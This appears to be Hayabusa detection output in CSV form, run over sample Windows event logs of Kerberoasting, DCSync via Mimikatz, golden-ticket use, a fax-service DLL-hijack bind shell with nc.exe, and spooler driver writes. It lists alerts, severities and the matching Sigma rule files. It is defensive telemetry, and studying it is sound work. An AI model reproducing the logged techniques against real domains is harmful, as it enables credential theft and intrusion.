0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c41e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.200 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.212 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,../hayabusa-rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x11b8cd00,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 0x11b8d014,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9d3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx 2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,../hayabusa-rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx 2020-08-03 01:24:07.559 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx 2020-08-12 22:04:27.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.454 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.603 